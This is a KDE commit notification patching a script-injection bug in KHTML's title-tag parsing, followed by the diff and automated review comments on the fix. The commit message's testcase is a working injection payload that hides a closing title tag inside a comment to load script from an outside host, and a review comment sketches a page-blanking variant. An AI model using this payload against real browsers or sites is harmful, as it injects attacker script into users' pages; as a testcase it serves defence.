
List:       kde-commits
Subject:    branches/KDE/3.5/kdelibs/khtml/html
From:       Dirk Mueller <mueller () kde ! org>
Date:       2007-01-24 16:15:55
Message-ID: 1169655355.952280.32313.nullmailer () svn ! kde ! org

SVN commit 626791 by mueller:

fix javascript insertion in <title> tags as described in:
http://www.securityfocus.com/archive/1/457763/30/30/threaded

Basically, we want to parse comments inside <title> as well, so that a </title> hidden
inside <!-- --> cannot end the title early and let a <script> tag through. Easy fix.

Testcase:
<title>myblog<!--</title></head><body><script
src=http://beanfuzz.com/bean.js> --></title>


 M  +2 -2      htmltokenizer.cpp  


--- branches/KDE/3.5/kdelibs/khtml/html/htmltokenizer.cpp #626790:626791
@@ -316,7 +316,7 @@
     while ( !src.isEmpty() ) {
         checkScriptBuffer();
         unsigned char ch = src->latin1();
-        if ( !scriptCodeResync && !brokenComments && !textarea && !xmp && !title && \
ch == '-' && scriptCodeSize >= 3 && !src.escaped() && QConstString( \
scriptCode+scriptCodeSize-3, 3 ).string() == "<!-" ) {
+        if ( \
!scriptCodeResync && !brokenComments && !textarea && !xmp && ch == '-' && \
scriptCodeSize >= 3 && !src.escaped() && QConstString( scriptCode+scriptCodeSize-3, 3 \
).string() == "<!-" ) {
  comment = true;
             scriptCode[ scriptCodeSize++ ] = ch;
             ++src;
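Review bot: Dropping `!title` from the condition lets `<!--` inside a title open a comment, but nothing in this hunk bounds that comment to the title element, so a title containing `<!--` with no matching `-->` would presumably swallow `</title>` and everything after it until the comment-end logic (outside this hunk) gives up — an attacker who controls only the title text could use that to blank the page or hide later markup. Please confirm what the comment-end path does in `title` mode and, if it does run past `</title>`, end the comment there for titles. The new condition also deserves a why-comment so the exclusion is not reintroduced, e.g. `// comments are parsed inside <title> too, so a </title> hidden in <!-- --> cannot close the title early (securityfocus 457763)`. This is a parser-side mitigation; the site generating the title still has to escape `<` in it. The enclosing tokenizer function begins before and continues after this hunk.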
@@ -495,7 +495,7 @@
 
             if (canClose || handleBrokenComments || scriptEnd ){
                 ++src;
-                if ( !( script || xmp || textarea || style) ) {
+                if ( !( title || script || xmp || textarea || style) ) {
 #ifdef COMMENTS_IN_DOM
                     checkScriptBuffer();
                     scriptCode[ scriptCodeSize ] = 0;
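Review bot: Adding `title` here keeps the comment from being materialised as a DOM node under `COMMENTS_IN_DOM`, the same as for script/style, but whether the buffered comment text is then dropped or re-emitted as title text depends on the branch after this `if`, which lies outside the hunk. A regression test built from the commit message's testcase, asserting that `document.title` is `myblog` and that no script element is created, would pin both this and the first hunk. A short comment on the new line, `// title: comment text is not part of the title and must not reach the DOM`, would document why `title` joins this list. The enclosing function begins before and continues after this hunk.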


